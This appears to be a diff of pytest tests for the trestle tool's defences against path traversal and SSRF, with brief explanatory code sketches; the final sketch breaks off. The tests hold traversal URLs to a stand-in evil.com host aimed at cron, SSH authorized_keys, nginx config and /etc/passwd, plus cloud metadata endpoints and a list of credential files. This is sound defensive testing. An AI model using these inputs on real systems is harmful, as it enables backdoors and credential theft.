    +            raise RuntimeError('Unexpected filesystem error')
    +
    +        monkeypatch.setattr(pathlib.Path, 'relative_to', mock_relative_to)
    +
    +        with pytest.raises(TrestleError, match='Error validating local path'):
    +            PathSecurityValidator.validate_local_path(valid_path, trestle_root)
    +
    +
    +class TestLocalFilePathValidation:
    +    """Test local file path validation with workspace boundaries and sensitive file checks."""
    +
    +    def test_validate_local_file_path_within_workspace(self, tmp_path: pathlib.Path) -> None:
    +        """Test that files within workspace are allowed."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        file_path = workspace / 'catalogs' / 'catalog.json'
    +        PathSecurityValidator.validate_local_file_path(workspace, file_path, allow_outside_workspace=False)
    +
    +    def test_validate_local_file_path_outside_workspace_blocked(self, tmp_path: pathlib.Path) -> None:
    +        """Test that files outside workspace are blocked when allow_outside_workspace=False."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        outside_file = tmp_path / 'outside.json'
    +
    +        with pytest.raises(TrestleError, match='Access to files outside the trestle workspace is not allowed'):
    +            PathSecurityValidator.validate_local_file_path(workspace, outside_file, allow_outside_workspace=False)
    +
    +    def test_validate_local_file_path_outside_workspace_allowed(self, tmp_path: pathlib.Path) -> None:
    +        """Test that non-sensitive files outside workspace are allowed when allow_outside_workspace=True."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        # Create a safe file outside workspace
    +        outside_file = tmp_path / 'safe_file.json'
    +        outside_file.touch()
    +
    +        # Should not raise
    +        PathSecurityValidator.validate_local_file_path(workspace, outside_file, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_passwd(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/passwd is blocked even with allow_outside_workspace=True."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        passwd_path = pathlib.Path('/etc/passwd')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, passwd_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_shadow(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/shadow is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        shadow_path = pathlib.Path('/etc/shadow')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, shadow_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_group(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/group is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        group_path = pathlib.Path('/etc/group')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, group_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_etc_sudoers(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /etc/sudoers is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        sudoers_path = pathlib.Path('/etc/sudoers')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, sudoers_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_ssh_directory(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .ssh directory is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        ssh_path = pathlib.Path('/home/user/.ssh/id_rsa')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, ssh_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_aws_credentials(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .aws credentials are blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        aws_path = pathlib.Path('/home/user/.aws/credentials')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, aws_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_docker_config(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .docker config is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        docker_path = pathlib.Path('/home/user/.docker/config.json')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, docker_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_kube_config(self, tmp_path: pathlib.Path) -> None:
    +        """Test that .kube config is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        kube_path = pathlib.Path('/home/user/.kube/config')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, kube_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_proc_environ(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /proc/self/environ is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        proc_path = pathlib.Path('/proc/self/environ')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, proc_path, allow_outside_workspace=True)
    +
    +    def test_validate_local_file_path_blocks_windows_system32(self, tmp_path: pathlib.Path) -> None:
    +        """Test that Windows System32 is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        win_path = pathlib.Path('C:\\Windows\\System32\\config\\SAM')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, win_path, allow_outside_workspace=True)
    +
    +    def test_validate_local_file_path_blocks_windows_credentials(self, tmp_path: pathlib.Path) -> None:
    +        """Test that Windows credentials are blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        cred_path = pathlib.Path('C:\\Users\\user\\AppData\\Local\\Microsoft\\Credentials\\secret')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, cred_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_var_log(self, tmp_path: pathlib.Path) -> None:
    +        """Test that /var/log is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        log_path = pathlib.Path('/var/log/auth.log')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, log_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_blocks_mysql_data(self, tmp_path: pathlib.Path) -> None:
    +        """Test that MySQL data directory is blocked."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        mysql_path = pathlib.Path('/var/lib/mysql/users.MYD')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, mysql_path, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_case_insensitive(self, tmp_path: pathlib.Path) -> None:
    +        """Test that sensitive path checking is case-insensitive."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        # Test uppercase variations
    +        passwd_upper = pathlib.Path('/ETC/PASSWD')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, passwd_upper, allow_outside_workspace=True)
    +
    +    @pytest.mark.skipif(sys.platform == 'win32', reason='Unix-specific sensitive paths')
    +    def test_validate_local_file_path_checks_original_and_resolved(self, tmp_path: pathlib.Path) -> None:
    +        """Test that both original and resolved paths are checked for sensitive patterns."""
    +        workspace = tmp_path / 'workspace'
    +        workspace.mkdir(parents=True)
    +
    +        # Create a path that might resolve differently
    +        # The validator checks both the original string and resolved path
    +        sensitive_path = pathlib.Path('/home/user/.ssh/authorized_keys')
    +
    +        with pytest.raises(TrestleError, match='Attempt to access potentially sensitive system file'):
    +            PathSecurityValidator.validate_local_file_path(workspace, sensitive_path, allow_outside_workspace=True)
    +
    +
    +class TestHTTPSFetcherPathTraversal:
    +    """Test HTTPSFetcher protection against path traversal attacks."""
    +
    +    def test_https_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious URL with path traversal
    +        evil_url = 'https://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_https_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that HTTPSFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal URL without traversal
    +        normal_url = 'https://example.com/catalogs/nist/catalog.json'
    +
    +        # Should not raise
    +        fetcher = HTTPSFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_https_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # URL with embedded traversal should be blocked
    +        url = 'https://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, url)
    +
    +
    +class TestSFTPFetcherPathTraversal:
    +    """Test SFTPFetcher protection against path traversal attacks."""
    +
    +    def test_sftp_fetcher_blocks_path_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher blocks path traversal in cache paths."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Malicious SFTP URL with path traversal
    +        evil_url = 'sftp://evil.com/../../../../../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +    def test_sftp_fetcher_allows_normal_paths(self, tmp_path: pathlib.Path) -> None:
    +        """Test that SFTPFetcher allows normal paths without traversal."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Normal SFTP URL without traversal
    +        normal_url = 'sftp://example.com/data/catalog.json'
    +
    +        # Should not raise
    +        fetcher = SFTPFetcher(tmp_path, normal_url)
    +
    +        # Verify cache path is within cache directory
    +        cache_dir = tmp_path / '.trestle' / 'cache'
    +        assert str(fetcher._cached_object_path).startswith(str(cache_dir))
    +
    +    def test_sftp_fetcher_blocks_embedded_traversal(self, tmp_path: pathlib.Path) -> None:
    +        """Test that embedded path traversal sequences are blocked."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # SFTP URL with embedded traversal should be blocked
    +        url = 'sftp://example.com/path/../data/file.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, url)
    +
    +
    +class TestRealWorldAttackVectors:
    +    """Test real-world attack vectors from the security advisory."""
    +
    +    def test_attack_vector_cron_injection(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of cron job injection attack vector."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /etc/cron.d/backdoor
    +        evil_url = 'https://evil.com/../../../../../../../etc/cron.d/backdoor'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_ssh_keys(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SSH authorized_keys injection."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to ~/.ssh/authorized_keys
    +        evil_url = 'https://evil.com/../../../../../../../root/.ssh/authorized_keys'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_tmp_write(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of arbitrary /tmp file write."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Write to /tmp/pwned.json
    +        evil_url = 'https://evil.com/../../../tmp/pwned.json'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_config_overwrite(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of config file overwrite."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: Overwrite nginx config
    +        evil_url = 'https://evil.com/../../../../../../../etc/nginx/conf.d/evil.conf'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            HTTPSFetcher(tmp_path, evil_url)
    +
    +    def test_attack_vector_sftp_private_network(self, tmp_path: pathlib.Path) -> None:
    +        """Test blocking of SFTP path traversal to system files."""
    +        test_utils.ensure_trestle_config_dir(tmp_path)
    +
    +        # Attack: SFTP to internal host with path traversal
    +        evil_url = 'sftp://192.168.1.1/../../../../../../../etc/passwd'
    +
    +        with pytest.raises(TrestleError, match='Security violation:.*[Pp]ath traversal blocked'):
    +            SFTPFetcher(tmp_path, evil_url)
    +
    +
    +def test_https_fetcher_blocks_ssrf_aws_metadata(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks AWS metadata endpoint."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='cloud metadata endpoints'):
    +        HTTPSFetcher(tmp_path, 'https://169.254.169.254/latest/meta-data/')
    +
    +
    +def test_https_fetcher_blocks_ssrf_gcp_metadata(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks GCP metadata endpoint."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='cloud metadata endpoints'):
    +        HTTPSFetcher(tmp_path, 'https://metadata.google.internal/computeMetadata/v1/')
    +
    +
    +def test_https_fetcher_blocks_ssrf_localhost(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher always blocks localhost (loopback)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Loopback is always blocked regardless of TRESTLE_BLOCK_PRIVATE_IPS
    +    with pytest.raises(TrestleError, match='127.0.0.0/8'):
    +        HTTPSFetcher(tmp_path, 'https://127.0.0.1:8080/')
    +
    +
    +def test_https_fetcher_blocks_ssrf_ipv6_loopback(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher always blocks IPv6 loopback."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # IPv6 loopback is always blocked regardless of TRESTLE_BLOCK_PRIVATE_IPS
    +    with pytest.raises(TrestleError, match='::1/128'):
    +        HTTPSFetcher(tmp_path, 'https://[::1]:8080/')
    +
    +
    +def test_https_fetcher_blocks_link_local_169_254(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher always blocks link-local 169.254.x.x addresses."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Link-local is always blocked (includes metadata endpoints)
    +    with pytest.raises(TrestleError, match='169.254.0.0/16'):
    +        HTTPSFetcher(tmp_path, 'https://169.254.1.1/some/path')
    +
    +
    +def test_https_fetcher_allows_private_network_10_by_default(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher allows 10.x.x.x private network IPs by default."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # RFC 1918 ranges are allowed by default to support private GitLab/internal OSCAL repos
    +    # This should not raise an error (though it will fail to connect in tests)
    +    try:
    +        fetcher = HTTPSFetcher(tmp_path, 'https://10.0.0.1:8500/v1/agent/self')
    +        # If we get here, the security validation passed (connection will fail but that's expected)
    +        assert fetcher is not None
    +    except TrestleError as e:
    +        # Should not be a security error about private IPs
    +        assert '10.0.0.0/8' not in str(e) or 'TRESTLE_BLOCK_PRIVATE_IPS' in str(e)
    +
    +
    +def test_https_fetcher_blocks_private_network_10_when_configured(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that HTTPSFetcher blocks 10.x.x.x when TRESTLE_BLOCK_PRIVATE_IPS is set."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    monkeypatch.setenv('TRESTLE_BLOCK_PRIVATE_IPS', 'true')
    +    with pytest.raises(TrestleError, match='10.0.0.0/8'):
    +        HTTPSFetcher(tmp_path, 'https://10.0.0.1:8500/v1/agent/self')
    +
    +
    +def test_https_fetcher_allows_private_network_192_by_default(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher allows 192.168.x.x private network IPs by default."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    try:
    +        fetcher = HTTPSFetcher(tmp_path, 'https://192.168.1.1/admin')
    +        assert fetcher is not None
    +    except TrestleError as e:
    +        assert '192.168.0.0/16' not in str(e) or 'TRESTLE_BLOCK_PRIVATE_IPS' in str(e)
    +
    +
    +def test_https_fetcher_blocks_private_network_192_when_configured(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that HTTPSFetcher blocks 192.168.x.x when TRESTLE_BLOCK_PRIVATE_IPS is set."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    monkeypatch.setenv('TRESTLE_BLOCK_PRIVATE_IPS', 'true')
    +    with pytest.raises(TrestleError, match='192.168.0.0/16'):
    +        HTTPSFetcher(tmp_path, 'https://192.168.1.1/admin')
    +
    +
    +def test_https_fetcher_allows_private_network_172_by_default(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher allows 172.16-31.x.x private network IPs by default."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    try:
    +        fetcher = HTTPSFetcher(tmp_path, 'https://172.16.0.1/admin')
    +        assert fetcher is not None
    +    except TrestleError as e:
    +        assert '172.16.0.0/12' not in str(e) or 'TRESTLE_BLOCK_PRIVATE_IPS' in str(e)
    +
    +
    +def test_https_fetcher_blocks_private_network_172_when_configured(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that HTTPSFetcher blocks 172.16-31.x.x when TRESTLE_BLOCK_PRIVATE_IPS is set."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    monkeypatch.setenv('TRESTLE_BLOCK_PRIVATE_IPS', 'true')
    +    with pytest.raises(TrestleError, match='172.16.0.0/12'):
    +        HTTPSFetcher(tmp_path, 'https://172.16.0.1/admin')
    +
    +
    +def test_sftp_fetcher_blocks_ssrf_aws_metadata(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher blocks AWS metadata endpoint."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='cloud metadata endpoints'):
    +        SFTPFetcher(tmp_path, 'sftp://169.254.169.254/latest/meta-data/')
    +
    +
    +def test_sftp_fetcher_blocks_ssrf_localhost(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher always blocks localhost (loopback)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Loopback is always blocked regardless of TRESTLE_BLOCK_PRIVATE_IPS
    +    with pytest.raises(TrestleError, match='127.0.0.0/8'):
    +        SFTPFetcher(tmp_path, 'sftp://127.0.0.1:22/data/file.json')
    +
    +
    +def test_sftp_fetcher_blocks_link_local_169_254(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher always blocks link-local 169.254.x.x addresses."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    # Link-local is always blocked (includes metadata endpoints)
    +    with pytest.raises(TrestleError, match='169.254.0.0/16'):
    +        SFTPFetcher(tmp_path, 'sftp://169.254.1.1:22/some/path')
    +
    +
    +def test_https_fetcher_blocks_invalid_scheme_http(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks HTTP scheme (only HTTPS allowed)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        HTTPSFetcher(tmp_path, 'http://example.com/data.json')
    +
    +
    +def test_https_fetcher_blocks_invalid_scheme_ftp(tmp_path: pathlib.Path) -> None:
    +    """Test that HTTPSFetcher blocks FTP scheme."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        HTTPSFetcher(tmp_path, 'ftp://example.com/data.json')
    +
    +
    +def test_sftp_fetcher_blocks_invalid_scheme_http(tmp_path: pathlib.Path) -> None:
    +    """Test that SFTPFetcher blocks HTTP scheme (only SFTP allowed)."""
    +    test_utils.ensure_trestle_config_dir(tmp_path)
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        SFTPFetcher(tmp_path, 'http://example.com/data.json')
    +
    +
    +def test_url_validator_blocks_invalid_scheme(tmp_path: pathlib.Path) -> None:
    +    """Test that URLSecurityValidator blocks invalid schemes."""
    +    from trestle.core.remote.security import URLSecurityValidator
    +
    +    validator = URLSecurityValidator()
    +
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        validator.validate_url('http://example.com/data.json')
    +
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        validator.validate_url('ftp://example.com/data.json')
    +
    +    with pytest.raises(TrestleError, match='Only HTTPS or SFTP schemes are allowed for remote URLs'):
    +        validator.validate_url('gopher://example.com/data')
    +
    +
    +def test_url_validator_handles_dns_resolution_failure(tmp_path: pathlib.Path, monkeypatch) -> None:
    +    """Test that URLSecurityValidator handles DNS resolution failures gracefully."""
    +    from trestle.core.remote.security import URLSecurityValidator
    +
    +    # Mock socket.getaddrinfo to return empty list (no IPs resolved)
    +    def mock_getaddrinfo(hostname, port):
    +        return []  # Empty list - no IPs resolved
    +
    +    monkeypatch.setattr(socket, 'getaddrinfo', mock_getaddrinfo)
    +
    +    validator = URLSecurityValidator()
    +    with pytest.raises(TrestleError, match='No IP addresses resolved for hostname'):
    +        validator.validate_url('https://nonexistent.example.com/data.json')
    +
    +
    +def test_url_validator_with_allowed_domains() -> None:
    +    """Test URL validation with domain allowlist."""
    +    # Test with allowed domain - should pass
    +    validator = URLSecurityValidator(allowed_domains={'example.com', 'test.com'})
    +    # This will fail DNS resolution but that's OK - we're testing the domain check happens first
    +    try:
    +        validator.validate_url('https://example.com/path')
    +    except TrestleError as e:
    +        # Should fail on DNS resolution, not domain check
    +        assert 'not in the allowed domains list' not in str(e)
    +
    +    # Test with disallowed domain - should fail on domain check
    +    validator = URLSecurityValidator(allowed_domains={'example.com'})
    +    with pytest.raises(TrestleError, match='not in the allowed domains list'):
    +        validator.validate_url('https://other.com/path')
    +
    +
    +def test_url_validator_invalid_ip_address(monkeypatch) -> None:
    +    """Test handling of invalid IP address from getaddrinfo."""
    +
    +    def mock_getaddrinfo(hostname, port):
    +        # Return a malformed IP that will trigger ValueError in ipaddress.ip_address()
    +        return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', ('not-an-ip', 0))]
    +
    +    monkeypatch.setattr(socket, 'getaddrinfo', mock_getaddrinfo)
    +
    +    validator = URLSecurityValidator()
    +    with pytest.raises(TrestleError, match='Invalid IP address'):
    +        validator.validate_url('https://example.com/path')
    +
    +
    +# Made with Bob
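
The traversal tests in this file check two things: a URL whose path contains a `..` segment is rejected, and an ordinary URL maps to a path under the cache directory. A minimal sketch of a check with that behaviour follows. It is an illustration only, not the code in `trestle/core/remote/security.py`; the names `safe_cache_path` and `CachePathError` are hypothetical.

```python
import pathlib
from urllib import parse


class CachePathError(ValueError):
    """Hypothetical error type: the URL would map outside the cache directory."""


def safe_cache_path(cache_root: pathlib.Path, url: str) -> pathlib.Path:
    """Map a URL to a file path under cache_root, rejecting path traversal."""
    u = parse.urlparse(url)
    if not u.hostname:
        raise CachePathError(f'URL {url!r} has no hostname')

    # Decode percent-escapes so that %2e%2e is treated like '..',
    # and normalise backslashes so Windows-style separators are covered.
    decoded = parse.unquote(u.path).replace('\\', '/')
    segments = [s for s in decoded.split('/') if s]
    if not segments:
        raise CachePathError(f'URL {url!r} has no file component')
    if any(s == '..' for s in segments):
        raise CachePathError(f'Path traversal blocked in {url!r}')

    root = cache_root.resolve()
    candidate = root.joinpath(u.hostname, *segments).resolve()

    # Defence in depth: the resolved path must still sit under the cache root.
    try:
        candidate.relative_to(root)
    except ValueError:
        raise CachePathError(f'Path traversal blocked in {url!r}') from None
    return candidate
```

Rejecting any `..` segment outright, rather than normalising it away, matches the embedded-traversal tests above, which expect `https://example.com/path/../data/file.json` to be refused even though it would resolve inside the cache.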
    
  • tests/trestle/core/remote/cache_test.py +15 -6 modified
    @@ -103,11 +103,11 @@ def test_https_fetcher_fails(tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyP
         """Test the HTTPS fetcher failing."""
         monkeypatch.setenv('myusername', 'user123')
         monkeypatch.setenv('mypassword', 'somep4ss')
    -    # This syntactically valid uri points to nothing and should ConnectTimeout.
    +    # This syntactically valid uri points to localhost which is now blocked for security
    +    # The security validator should reject this before any connection attempt
         uri = 'https://{{myusername}}:{{mypassword}}@127.0.0.1/path/to/file.json'
    -    fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
    -    with pytest.raises(TrestleError, match='retries exceeded'):
    -        fetcher._update_cache()
    +    with pytest.raises(TrestleError, match='127.0.0.0/8'):
    +        cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
     
     
     def test_https_fetcher(tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyPatch) -> None:
    @@ -204,10 +204,10 @@ def ssh_urlparse_mock(*args, **kwargs):
         fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
         with pytest.raises(err.TrestleError, match='connect via SSH'):
             fetcher._update_cache()
    -    # malformed uri
    +    # malformed uri - security validator now catches urlparse errors first
         monkeypatch.setattr(SSHClient, 'connect', ssh_connect_mock)
         monkeypatch.setattr(parse, 'urlparse', ssh_urlparse_mock)
    -    with pytest.raises(err.TrestleError, match='malformed'):
    +    with pytest.raises(err.TrestleError, match='Invalid URL format'):
             _ = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, uri)
     
     
    @@ -296,6 +296,15 @@ def test_fetcher_factory(tmp_trestle_dir: pathlib.Path, monkeypatch: MonkeyPatch
         fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, https_uri)
         assert isinstance(fetcher, cache.HTTPSFetcher)
     
    +    # Mock DNS resolution for SFTP tests to avoid "Unable to resolve hostname" errors
    +    import socket
    +
    +    def mock_getaddrinfo(host, port, *args, **kwargs):
    +        # Return a fake IP address for any hostname
    +        return [(socket.AF_INET, socket.SOCK_STREAM, 6, '', ('192.0.2.1', 22))]
    +
    +    monkeypatch.setattr(socket, 'getaddrinfo', mock_getaddrinfo)
    +
         sftp_uri = 'sftp://user@hostname:/path/to/file.json'
         fetcher = cache.FetcherFactory.get_fetcher(tmp_trestle_dir, sftp_uri)
         assert isinstance(fetcher, cache.SFTPFetcher)
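
The changes above rely on the validator resolving the hostname and rejecting loopback addresses before any connection is attempted. A rough sketch of that kind of check, using only the standard library, could look like the following. The function name `check_host` and the `block_private` parameter are assumptions made for illustration (the parameter stands in for the `TRESTLE_BLOCK_PRIVATE_IPS` environment variable seen in the tests); this is not the `URLSecurityValidator` implementation.

```python
import ipaddress
import socket
from typing import List
from urllib import parse

# Ranges the tests describe as always blocked: loopback and link-local.
ALWAYS_BLOCKED = [ipaddress.ip_network(n) for n in ('127.0.0.0/8', '::1/128', '169.254.0.0/16')]
# RFC 1918 ranges, blocked only on request in this sketch.
PRIVATE = [ipaddress.ip_network(n) for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]


def check_host(url: str, block_private: bool = False) -> List[str]:
    """Resolve the URL's host and raise ValueError if any address is blocked."""
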